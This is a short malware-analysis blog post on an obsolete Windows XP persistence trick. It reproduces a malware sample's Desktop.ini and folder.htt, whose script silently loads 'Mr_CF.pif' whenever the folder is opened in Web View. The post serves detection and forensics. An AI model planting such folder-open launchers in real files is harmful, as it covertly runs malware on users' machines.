Beyond good ol’ Run key, Part 49

November 5, 2016 in Autostart (Persistence), Compromise Detection, Forensic Analysis, Incident Response, Malware Analysis

I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival – it used the desktop.ini / folder.htt combo that comes to play when the Web View is chosen for folders (XP or earlier). I know, I know.. it’s archaeology… but I checked my old posts in this series and realized I have not covered it yet, so I am fixing it now…

An example Desktop.ini created by the malware looks like this:

[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

and the associated folder.htt like this:

<html>
<head>
<meta http-equiv="content-type"content="text/html; charset=Windows-1252">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid= "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100; height: 100" tabIndex=-1>
</object>
</body>
</html>
<script>
objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
objectstr+="CODEBASE=\"Mr_CF.pif#version=1,1,1,1\">"
objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">"
objectstr+="</OBJECT>"
objectstr+="<HTML><H1></H1></HTML>";
document.writeln(objectstr);
document.close();
</script>

There is not much more I can write here… this is super old-school and I am just adding it for completeness.

Share this :)

Comments are closed.